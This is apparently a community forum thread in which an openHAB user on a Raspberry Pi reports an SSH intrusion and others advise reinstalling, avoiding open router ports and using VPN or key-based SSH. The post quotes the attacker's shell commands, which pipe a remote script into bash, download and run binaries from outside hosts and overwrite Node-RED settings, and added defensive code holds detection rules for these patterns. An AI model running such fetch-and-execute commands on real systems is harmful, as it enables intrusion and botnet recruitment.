Openhab Servers potential target for attacks

Hello all,

This is just for information; my question is at the end…

Yesterday my openhab server, running on a RasPi4, was attacked by someone unknown, and they managed to run some commands with sudo; this happened between 20h and 00h:

curl http://45.80.153.168:26/ip2.sh | bash

apt update -y; apt install curl cron nano -y; service cron start; uname -a

sudo apt update -y; sudo apt install curl cron nano -y; sudo service cron start; uname -a

cd /tmp; curl -o php http://185.28.39.15/x-8.6-.ISIS; chmod +x php; ./php; rm -rf php

cd /tmp; curl -o php http://185.28.39.15/a-r.m-6.ISIS; chmod +x php; ./php; rm -rf php

cd ~/.node-red; mv settings.js test.js; curl -o settings.js http://185.28.39.15/nodered.txt

pkill node-red | node-red

I have no idea how they managed to get in; this is something I am still trying to figure out. For now I closed all ports on my router, and now I want to find out what was damaged.

First of all, they downloaded a script file and ran it; no idea what was inside, as it is not available anymore. Then they ran two files, one for x86 and one for ARM; it could be that the ARM file ran through. They are still available.
Info about that ARM file is here: Automated Malware Analysis Report for a-r.m-6.ISIS - Generated by Joe Sandbox

No idea what that was doing; maybe I was involved in some kind of DDoS attack. I also checked the crontab entries for openhabian and for root: no entries there, no idea why they installed cron. And they replaced my node-red settings; they changed these lines here:

...
adminAuth: {
    type: "credentials",
    users: [
        {
            username: "admin",
            password: "$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO",
            permissions: "*"
        },
        {
            username: "george",
            password: "$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO",
            permissions: "read"
        }
    ]
},
...
    httpNodeAuth: {user:"user",pass:"$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO"},
    httpStaticAuth: {user:"user",pass:"$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO"},
...

After that my existing flows were unreadable; I had to undo the changes and re-import the backed-up flows.

So just for your information: check all your open ports and create backups…

My next question is: is it possible to run an AV scan on an openHAB system? How can I do this? I want to be sure that there are no other files left over from that operation…

Greetings Jack
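An added example (not part of the original post) of how a defender can triage shell history for the pattern Jack quotes above: the sample history is constructed from the commands in the post plus two benign lines, and the rules, their labels and the function names are my own.

```python
import re

# Constructed sample: the shell-history lines quoted in the post above,
# plus two benign lines so the scanner has something it must ignore.
SAMPLE_HISTORY = """\
ls -la
curl http://45.80.153.168:26/ip2.sh | bash
sudo apt update -y; sudo apt install curl cron nano -y; sudo service cron start; uname -a
cd /tmp; curl -o php http://185.28.39.15/a-r.m-6.ISIS; chmod +x php; ./php; rm -rf php
cd ~/.node-red; mv settings.js test.js; curl -o settings.js http://185.28.39.15/nodered.txt
pkill node-red | node-red
sudo systemctl status openhab
"""

# Each rule is (label, regex). Labels are hypothetical; the patterns describe
# the behaviours seen in the post, not any particular malware family.
RULES = [
    ("remote script piped straight into a shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba)?sh\b")),
    ("download to /tmp, mark executable, run, then delete",
     re.compile(r"cd\s+/tmp.*\b(curl|wget)\b.*chmod\s+\+x.*\./\w+.*rm\s+-rf")),
    ("Node-RED settings.js replaced from a remote host",
     re.compile(r"\.node-red.*settings\.js.*\b(curl|wget)\b")),
    ("Node-RED process killed and restarted",
     re.compile(r"pkill\s+node-red")),
    ("cron installed or started (persistence preparation)",
     re.compile(r"apt\s+install\b.*\bcron\b|service\s+cron\s+start")),
]

def scan_history(text):
    """Return [(line_no, label, line)] for every history line matching a rule.
    A line may trigger several rules; each hit is reported separately."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for label, rx in RULES:
            if rx.search(line):
                findings.append((no, label, line))
    return findings

def triggered_labels(text):
    """Set of rule labels seen at least once; useful as a quick triage verdict."""
    return {label for _, label, _ in scan_history(text)}

if __name__ == "__main__":
    for no, label, line in scan_history(SAMPLE_HISTORY):
        print(f"line {no}: {label}\n    {line}")
```

Run it against ~/.bash_history of every account on the box (openhabian, root, any service user); an empty result is not proof of a clean machine, because history can be edited or disabled by the intruder.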

As you have mentioned several times in your post that you have no idea what the attackers have done, you will never be sure whether everything has been removed from your system.

Therefore, delete everything, reinstall, check that your backups are not corrupted, and restore the backups…

1 Like

Nothing special about “openhab servers” here. Just an openly accessible server, which happens to run openhab.
If you’re not 100% sure what you are doing, please never ever open ports in your router to any device in your home network at all.

With that out of the way: you can run whatever AV you want on your OS (you only mentioned Pi4 - assuming it’s Raspberry Pi OS).

But what I’d suggest:

  1. back up your openhab (assuming you backed up your nodered on the same machine, you know how)
  2. install either openHABian from scratch or do a manual installation
  3. restore your openhab backup (check for integrity first)
  4. perhaps re-install the rest of your applications on your Pi4

And, most importantly: make sure you take the necessary precautions for network safety in your home network.
There’s normally no use case in which you should open ports for your openhab server! But if you do so, you are responsible for that security issue; the openHAB community does NOT RECOMMEND opening ports of any kind, unless you know what you’re doing by heart.

1 Like

Of course, I know, I blame no one except me. :man_facepalming:
I opened the port for a reason, but then forgot to close it; my fault…

Yeah, I’m running the latest openhabian system for Raspberry Pi.

What confuses me is that they touched the node-red configuration, but then did nothing with it; without that I would not even have noticed the attack… :thinking:

Yes, that advice is clear: back up everything, install from scratch, restore… A lot of work… But it seems necessary… You mean an AV scan would not change anything?

They got in, found something, changed the nodered to access it and potentially add some nodes (DDoS or whatever), and I guess they got interrupted or found something better, or dropped some sleeping script somewhere to unfold later. :man_shrugging: You’ll never know if you’re not able to perform some forensic measures.

An AV scan is part of a security strategy, but as you said, you are not sure what they did; an AV scan is not a real measure after the fact here. They could have hidden some script somewhere that neither you nor an AV scan will discover.
So: vanilla system (best to use a fresh SD card), restore checked (aka non-compromised) backups, step up your security measures, and don’t open any ports again.

1 Like

Of interest is whether it was the openHAB ports that were exposed. If they got in through openHAB itself, that’s worth further exploration. But if it was some other port/service, there isn’t much we can do except to say “don’t do that.”

@Matze0211 and @binderth are spot on with their advice. Don’t waste time trying to fix what may have been done to your machine. You can never trust it again, and there is almost certainly a RAT (Remote Access Trojan) installed, so the attacker is still there.

Remove the machine from the network immediately and then restore from a full backup prior to the attack, or start over from scratch. You can probably trust text-based configs copied from this compromised machine, but I wouldn’t trust any binaries.

But what hasn’t been said is to monitor all the rest of your machines on your LAN too. With this machine compromised, the attacker has had free access to all the machines on your LAN and may have compromised one or more of those too.

Usually, unless you lead a particularly interesting life, the motivations for these types of attacks are:

  • installing cryptominers (look for machines running hot for no apparent reason)
  • adding the machines to a bot herd for DDoS attacks
  • crypto locker/ransom (“I’ve encrypted all your files, pay me for the key.”)
  • identity theft

Nothing that you saw. They could have deleted the traces of their activity. If they installed a rootkit, they could have gigabytes of stuff hidden on your machine that you can’t see.

That’s why you can’t trust that machine.

The only thing I can add here is that AV is only able to detect “known bad” stuff. Assuming that the AV can even see all the files that the attacker put on your machine, it’s only going to detect files that have previously been submitted to the AV company and which the AV vendor decided were worthy of generating a signature to detect.

This looks like a very targeted attack on Node Red running on a Linux machine. I doubt there are many, if any, AV products that can detect that. And even if they detect it, they may not be able to remove it. But we also don’t know what else was done. We don’t know what was in those scripts, and we don’t know what commands and stuff they may have run that didn’t get captured.

3 Likes

Are you running openHAB 2 or 3? There are good reasons to run V3 with increased security features, so do not use a V2 setup if that is what you are running. Also aimed at other users that continue to run old outdated software.

If you run an old openHAB version it may be vulnerable to Log4Shell, see:

It was port 22, SSH, but open on a completely different port, 3xxx. I changed the default password to an 8-character password with upper-case, lower-case and numeric characters. Seems that this was not strong enough.

Yeah, I have openhabian-config backups there; I think I can trust them, they shouldn’t have any binaries.
And I monitor the other machines on the network, but it seems there is nothing, as they have different usernames and passwords and AV+firewall enabled.

openHAB 3.3.0, updated it nearly a week ago.

Or it got compromised elsewhere. You have evidence they logged in with this password?

I never understood why everyone is so big on moving ssh to some different port, as if it’s not the utmost simplicity to tell when ssh is running on any given port. It’s a totally lame protection measure which only serves to avoid the dumbest of script kiddies and attack bots filling your auth log with login attempts.

I don’t recommend exposing ssh to the Internet at all (use Tailscale or some other type of VPN) but if you do, at a minimum you should use certificate based login, not password based. Even better would be to configure two-factor authentication.

If you mean Amanda, then that definitely does include binaries. But it’s not the binaries that you have to worry about. It’s the fact that the attacker had/has remote access to your network. You might be fine, but don’t assume it. Take actions to help in case they managed to establish themselves on one of your other machines. Remember, a username and password weren’t enough to protect you from this attacker already.

A firewall is good, but most of the time in a home environment they will allow any traffic from the LAN because the LAN is considered trusted. Make sure your firewalls are actually blocking traffic from the LAN, or else the firewall is doing nothing. And the AV, as already discussed, is only going to detect known bad files. It’s usually not going to detect network-based attacks and certainly won’t detect or block activity on the machine that an attacker is doing manually.

Regardless, if it wasn’t OH that was exposed, it likely wasn’t OH that was compromised, so there isn’t anything we can/need to look into to make OH stronger because of this particular attack.

1 Like
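As an added example (my own code, not from the thread or the openHAB project) of checking the advice above, this audits an sshd_config against "key-based login, no passwords, no root password"; both config samples are constructed, and the sshd defaults used for missing keywords are those of current OpenSSH.

```python
import re

# Constructed samples, not copied from any real system. WEAK is the state the
# thread describes: sshd moved to a high port but still accepting passwords.
WEAK_CONFIG = """\
Port 3022
PermitRootLogin yes
PasswordAuthentication yes
"""
HARDENED_CONFIG = """\
Port 3022
PermitRootLogin no
PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
"""
# sshd defaults for the keywords checked; a keyword absent from the file has
# this value. KbdInteractiveAuthentication was called
# ChallengeResponseAuthentication in older OpenSSH releases.
DEFAULTS = {"permitrootlogin": "prohibit-password", "passwordauthentication": "yes",
            "kbdinteractiveauthentication": "yes", "pubkeyauthentication": "yes"}

def parse_sshd_config(text):
    """Map lowercased keyword -> value. sshd honours the FIRST occurrence of a
    keyword, so a later duplicate must not override an earlier one here either."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        m = re.match(r"(\S+?)(?:\s*=\s*|\s+)(.*)", line)   # "Key value" or "Key=value"
        if m:
            cfg.setdefault(m.group(1).lower(), m.group(2).strip())
    return cfg

def audit(cfg):
    """Return human-readable findings; an empty list means the checked settings
    match the advice above (key-based login only, no password path for root)."""
    def get(key):
        return cfg.get(key, DEFAULTS.get(key, "")).lower()
    findings = []
    if get("passwordauthentication") != "no":
        findings.append("PasswordAuthentication is not 'no': passwords can be guessed")
    if get("kbdinteractiveauthentication") != "no":
        findings.append("KbdInteractiveAuthentication is not 'no': PAM can still prompt for a password")
    if get("pubkeyauthentication") != "yes":
        findings.append("PubkeyAuthentication is off: key-based login is impossible")
    if get("permitrootlogin") not in ("no", "prohibit-password"):
        findings.append("PermitRootLogin allows root to log in with a password")
    if findings and cfg.get("port", "22") != "22":
        findings.append("moving sshd to port %s hides nothing; fix the items above" % cfg["port"])
    return findings
```

After changing the file, `sshd -t` validates the syntax and `sshd -T` prints the effective values, which is what this parser approximates.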

There are similarities described here:

Another thing that came to my mind

What I seriously don’t get:
Why would you simply open a port in your router (most routers will tell you how dangerous that is!) without any precautions, no WAF, no firewall, and obviously either weak passwords or an outdated OS? And just be cool with it, until either some application somehow asks for a password or another server is unresponsive because it’s getting hot with malware/crypto/whatever…

It’s so easy to set up a VPN and just have a safe home network. Seriously, smh…

For sure, as I had all the commands they ran in my command history for openhabian.

That’s true, I just wanted to mention that maybe OH/NR is a new target for such attacks…
As @Wolfgang_S mentioned, it seems I’m not the only one who had those problems…

Seeing the commands in the history does not necessarily mean that the password was used as the entry point. In case there is a vulnerable process running with that user’s ID, it could be possible to get a shell for that user by using that vulnerability as the entry point.
But in case the ssh port was open to the internet (as stated above) and the default password for openhabian was not changed, then this is most probably the way the door was left open for the guest. As the relation between openhab and openhabian is close, it is easy for an attacker to check for default passwords for default users.

I changed the default password as mentioned above:

Hi,

I’m using Wireguard VPN to access my LAN remotely.
Is this a good/safe strategy?

1 Like

It’s part of a good/safe strategy. If you did not open ports in your router yourself, you should be fine.
As long as ports are to be opened from “within”, they’re not freely accessible from the “outside”. This is (or should be) standard behaviour on every decent internet router.

FYI: a VPN (be it wireguard or another decent, strong one) does allow you to access your home network without actively exposing your network to the internet. As long as you only use VPN to access your home network, you are way more secure than if you opened a port and used that for an “exposed host” without any other safety measures.

So a safe strategy is only using VPN to access your network remotely, as long as you’re following the other parts of the safety guidelines: there are external threats like the one described here and internal threats like plugging in a compromised USB stick or clicking on a wrong internet address…
A good entry point is

PS: if it’s only about accessing your openHAB somehow, have a look at the openHAB Cloud, which allows you to access your items and send some commands, with the openHAB app for example:

Yes, perfectly fine.

A bit difficult with a vanilla Wireguard server installed in your LAN. But it’s not an issue: Wireguard is silent on the port at all times unless the correct credentials are used.

1 Like

What I want to stress is: don’t ever use “open port” or even “expose host” in your router unless you know exactly what you’re doing.

We could talk about point-to-point or site-to-site VPNs at this point; the best solution is always in the router (or DMZ). AVM FritzBoxes offer that, even wireguard with the next official release (and beta FritzOS at the moment).
But the point is: accessing your network or one specific device via VPN is way more secure than “only” opening ports or exposing a host.